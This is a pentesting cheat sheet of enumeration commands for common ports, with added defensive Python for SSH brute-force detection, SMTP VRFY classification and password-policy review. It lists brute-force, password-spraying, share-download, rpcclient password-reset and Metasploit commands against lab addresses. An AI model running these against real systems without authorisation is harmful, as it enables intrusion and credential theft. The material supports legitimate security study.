# 02 Port Enumeration

## Port 21 - FTP

```
nmap --script ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 10.11.1.5 
```

## Port 22 - SSH

Try logging in with default or trivial accounts first: admin:admin, root:root, user:password.

Brute force:

```
patator ssh_login host=10.11.1.5 port=22 user=root 0=/usr/share/metasploit-framework/data/wordlists/unix_passwords.txt password=FILE0 -x ignore:mesg='Authentication failed.'
hydra -l user -P /usr/share/wordlists/password/rockyou.txt -e s ssh://10.11.1.5
medusa -h 10.11.1.5 -u user -P /usr/share/wordlists/password/rockyou.txt -e s -M ssh
ncrack --user user -P /usr/share/wordlists/password/rockyou.txt ssh://10.11.1.5
```
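The other side of the brute-force commands above is what they leave in `sshd`'s log. The following is an added example (not part of this page or any of the tools it lists) that parses syslog-style `auth.log` lines and flags a source address that produces a burst of `Failed password` events inside a short window, also recording whether a later `Accepted` login from the same address followed the burst. The log lines, the host name `web01`, the threshold and the window size are all constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of sshd lines in the classic syslog auth.log layout.
# These lines are made up for this example, not captured from a real host.
SAMPLE_AUTH_LOG = """\
Mar  3 10:15:01 web01 sshd[2101]: Failed password for root from 10.11.1.5 port 50112 ssh2
Mar  3 10:15:02 web01 sshd[2101]: Failed password for root from 10.11.1.5 port 50112 ssh2
Mar  3 10:15:02 web01 sshd[2103]: Failed password for invalid user admin from 10.11.1.5 port 50114 ssh2
Mar  3 10:15:03 web01 sshd[2105]: Failed password for invalid user user from 10.11.1.5 port 50116 ssh2
Mar  3 10:15:04 web01 sshd[2107]: Failed password for root from 10.11.1.5 port 50118 ssh2
Mar  3 10:15:05 web01 sshd[2109]: Accepted password for root from 10.11.1.5 port 50120 ssh2
Mar  3 10:20:00 web01 sshd[2201]: Failed password for alice from 192.0.2.10 port 40000 ssh2
Mar  3 10:21:00 web01 sshd[2203]: Accepted publickey for alice from 192.0.2.10 port 40002 ssh2
"""

# "invalid user" is present when the username does not exist on the host.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)
ACCEPT_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Accepted \S+ for (?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_ts(ts, year=2024):
    """Syslog timestamps carry no year; the caller supplies one (assumed here)."""
    return datetime.strptime(f"{year} {ts}", "%Y %b %d %H:%M:%S")


def detect_bruteforce(log_text, threshold=4, window_seconds=60):
    """Return {ip: alert} for every source with >= threshold failures in any window."""
    failures = defaultdict(list)   # ip -> [(datetime, user)]
    accepts = defaultdict(list)    # ip -> [(datetime, user)]
    for line in log_text.splitlines():
        m = FAILED_RE.match(line)
        if m:
            failures[m["ip"]].append((parse_ts(m["ts"]), m["user"]))
            continue
        m = ACCEPT_RE.match(line)
        if m:
            accepts[m["ip"]].append((parse_ts(m["ts"]), m["user"]))

    alerts = {}
    for ip, events in failures.items():
        events.sort()
        best = None          # (count, start_index, end_index) of the densest window
        start = 0
        for end in range(len(events)):
            # Slide the window start forward until it fits inside window_seconds.
            while (events[end][0] - events[start][0]).total_seconds() > window_seconds:
                start += 1
            count = end - start + 1
            if count >= threshold and (best is None or count > best[0]):
                best = (count, start, end)
        if best is None:
            continue
        count, start, end = best
        burst_end = events[end][0]
        alerts[ip] = {
            "failures": count,
            "users": sorted({u for _, u in events[start:end + 1]}),
            "first": events[start][0].isoformat(),
            "last": burst_end.isoformat(),
            # A successful login after the burst is the case worth paging on.
            "success_after_burst": [u for t, u in accepts.get(ip, []) if t >= burst_end],
        }
    return alerts


if __name__ == "__main__":
    for ip, alert in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(ip, alert)
```

The thresholds are deliberately low so the sample triggers; in practice tune them to the host's normal failure rate, and treat `success_after_burst` as the high-severity case. The same classification is what `fail2ban`'s sshd jail performs, and key-only authentication (`PasswordAuthentication no`) removes the signal the page's tools rely on altogether.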

## Port 25 - SMTP

```
nc -nvv 10.11.1.5 25
HELO foo<cr><lf>

telnet 10.11.1.5 25
VRFY root
```

> <https://tools.kali.org/information-gathering/smtp-user-enum>
>
> ```
> nmap --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 10.11.1.5
> smtp-user-enum -M VRFY -U /root/sectools/SecLists/Usernames/Names/names.txt -t 10.11.1.5
> ```
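`smtp-user-enum -M VRFY` works only because the server answers `VRFY` differently for names that exist and names that do not. The following added example (not part of this page or of `smtp-user-enum`) parses SMTP reply lines, classifies a `VRFY` reply, and decides whether a set of replies from one server distinguishes valid accounts from invalid ones. The reply strings are constructed for the example; the function names are hypothetical.

```python
import re

# Constructed reply lines as a server might return to "VRFY <name>".
# None of these were captured from a real host.
LEAKY_REPLIES = [
    "250 2.1.5 root <root@mail.example.test>",
    "550 5.1.1 <nobody>: Recipient address rejected: User unknown in local recipient table",
]
HARDENED_REPLIES = [
    "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery",
    "252 2.5.2 Cannot VRFY user, but will accept message and attempt delivery",
]
DISABLED_REPLIES = ["502 5.5.1 VRFY command is disabled"]

# "250 text" is a final line, "250-text" a continuation line of a multi-line reply.
REPLY_RE = re.compile(r"^(?P<code>\d{3})(?P<sep>[ -])(?P<text>.*)$")


def parse_reply(line):
    """Return (code, text, is_final) for one SMTP reply line."""
    m = REPLY_RE.match(line.rstrip("\r\n"))
    if not m:
        raise ValueError(f"not an SMTP reply line: {line!r}")
    return int(m["code"]), m["text"], m["sep"] == " "


def classify_vrfy(reply):
    """Map a VRFY reply to what it tells the client about the queried name."""
    code, _, _ = parse_reply(reply)
    if code in (250, 251):
        return "exists"          # server confirmed (or forwarded) the mailbox
    if code == 252:
        return "noncommittal"    # will accept mail but refuses to confirm
    if code in (550, 551, 553):
        return "unknown"         # server confirmed the mailbox does not exist
    if code in (500, 502):
        return "disabled"        # command not implemented / switched off
    return "other"


def vrfy_leaks_accounts(replies):
    """True when any reply confirms or denies a mailbox: that is the enumeration oracle."""
    kinds = {classify_vrfy(r) for r in replies}
    return bool(kinds & {"exists", "unknown"})


if __name__ == "__main__":
    for name, replies in (("leaky", LEAKY_REPLIES), ("hardened", HARDENED_REPLIES),
                          ("disabled", DISABLED_REPLIES)):
        print(name, [classify_vrfy(r) for r in replies], vrfy_leaks_accounts(replies))
```

A server is hardened when every `VRFY` gets the same noncommittal `252` or the command is refused outright (in Postfix, `disable_vrfy_command = yes`). `EXPN` replies classify the same way, and a server that rejects unknown recipients at `RCPT TO` time with a distinct `550` exposes the same oracle, which is why `smtp-user-enum` offers those modes too.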

## Port 53 - DNS

```
dnsrecon -d 10.10.10.192
```

## Port 88 - Kerberos

```
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='DOMAIN.LOCAL'" 10.11.1.5 
```

<https://github.com/TarlogicSecurity/kerbrute>

```
python kerbrute.py -dc-ip 10.11.1.5 -users /root/document/ctf/htb/kb_users.txt -passwords /root/pass_common_plus.txt -threads 20 -domain DOMAIN -outputfile kb_extracted_passwords.txt
```

## Port 110 - POP3

```
telnet 10.11.1.5 110
USER fkclai@10.11.1.5
PASS abcd1234

# or, without the host suffix:
USER fkclai
PASS abcd1234

# List all emails
LIST
```

## Port 111 - Rpcbind

```
rpcinfo -p 10.11.1.5
rpcclient -U "" 10.11.1.5
    #rpcclient $>srvinfo
    #rpcclient $>enumdomusers
    #rpcclient $>querydominfo
    #rpcclient $>getdompwinfo  # password policy
    #rpcclient $>netshareenum
    #rpcclient $>enumprivs
    #rpcclient $>setuserinfo2 <user id> 23 abcd@1234
```
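`getdompwinfo` returns the domain password policy as a minimum length plus a `password_properties` bitmask. The following added example (not from this page or from `rpcclient`) parses that output, decodes the bitmask with the MS-SAMR flag names, and reports the settings a reviewer would flag. The two output samples are constructed, and the 12-character baseline is an assumption to adjust to your own policy.

```python
import re

# Constructed samples in the shape of rpcclient's getdompwinfo output.
WEAK_OUTPUT = """\
min_password_length: 7
password_properties: 0x00000010
\tDOMAIN_PASSWORD_STORE_CLEARTEXT
"""
STRONG_OUTPUT = """\
min_password_length: 14
password_properties: 0x00000001
\tDOMAIN_PASSWORD_COMPLEX
"""

# DOMAIN_PASSWORD_INFORMATION flag bits (MS-SAMR).
PASSWORD_PROPERTY_FLAGS = {
    0x01: "DOMAIN_PASSWORD_COMPLEX",
    0x02: "DOMAIN_PASSWORD_NO_ANON_CHANGE",
    0x04: "DOMAIN_PASSWORD_NO_CLEAR_CHANGE",
    0x08: "DOMAIN_LOCKOUT_ADMINS",
    0x10: "DOMAIN_PASSWORD_STORE_CLEARTEXT",
    0x20: "DOMAIN_REFUSE_PASSWORD_CHANGE",
}

FIELD_RE = re.compile(r"^\s*(?P<key>min_password_length|password_properties):\s*(?P<value>\S+)")


def parse_getdompwinfo(text):
    """Parse the two key/value lines; the indented flag names are derived, not read."""
    policy = {"min_password_length": None, "password_properties": 0}
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        if m["key"] == "min_password_length":
            policy["min_password_length"] = int(m["value"])
        else:
            policy["password_properties"] = int(m["value"], 16)
    mask = policy["password_properties"]
    policy["flags"] = [name for bit, name in PASSWORD_PROPERTY_FLAGS.items() if mask & bit]
    return policy


def assess_policy(policy, min_length=12):
    """Return a list of findings; empty means nothing to report against this baseline."""
    findings = []
    length = policy["min_password_length"]
    if length is None:
        findings.append("min_password_length not reported")
    elif length < min_length:
        findings.append(f"minimum password length {length} is below {min_length}")
    if "DOMAIN_PASSWORD_COMPLEX" not in policy["flags"]:
        findings.append("password complexity is not enforced")
    if "DOMAIN_PASSWORD_STORE_CLEARTEXT" in policy["flags"]:
        findings.append("passwords are stored with reversible encryption")
    return findings


if __name__ == "__main__":
    for label, output in (("weak", WEAK_OUTPUT), ("strong", STRONG_OUTPUT)):
        policy = parse_getdompwinfo(output)
        print(label, policy["flags"], assess_policy(policy))
```

The fact that `rpcclient -U ""` answered at all is a finding of its own: anonymous SAM and share enumeration should be restricted on the host so that the policy, user list and share list are not readable without credentials.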

## Port 135 - MSRPC

```
nmap 10.11.1.5 --script=msrpc-enum
rpcdump.py 10.10.10.192 -p 135 >> /tmp/rpc.txt
```

## Port 139/445 - SMB

```
# Enumeration
smbmap -H 10.11.1.8
smbmap -u "guest" -p "" -H 10.11.1.31
nmap --script smb-enum-shares -p 139,445 10.11.1.8
enum4linux nest.htb
smbclient -L nest.htb
smbclient -U "r.thompson" -L \\\\10.10.10.182
smbclient -L //10.10.10.192 -N

# Check vulns
nmap --script smb-vuln* -p139,445 -T4 -Pn 10.11.1.8
nmap --script smb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols -p 139,445 10.11.1.8
nmap --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse -p 139,445 10.11.1.8
nmap --script vuln -p 135,139,445 10.10.10.40
```

```
# Authenticated access and recursive download of a share
smbmap -u TempUser -p welcome2019 -H nest.htb -R
smbclient \\\\nest.htb\\Data -U TempUser
smbclient //10.10.10.192/forensic -U audit2020 --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000
    mask ""
    recurse ON
    prompt OFF
    mget *
```

## Port 389/636 - LDAP

```
ldapsearch -h 10.11.1.8 -p 389 -x -b "dc=fkclai,dc=com"
ldapsearch -x -h 10.11.1.8 -D 'DOMAIN\fkclai' -w 'hash-password'
ldapdomaindump 10.11.1.8 -u 'DOMAIN\fkclai' -p 'hash-password'

# https://github.com/ropnop/windapsearch
windapsearch.py -d abcde.local --dc-ip 10.10.10.175 -U
```

## Port 1433 - MSSQL

```
nmap -p 1433 --script=ms-sql-info.nse 10.11.1.8
# The SQL Server Browser service answers on UDP 1434 and lists named instances
nmap -sU -p 1434 --script=ms-sql-info.nse 10.11.1.8

# Metasploit modules
    use auxiliary/scanner/mssql/mssql_ping
    use auxiliary/scanner/mssql/mssql_login
    use exploit/windows/mssql/mssql_payload
```


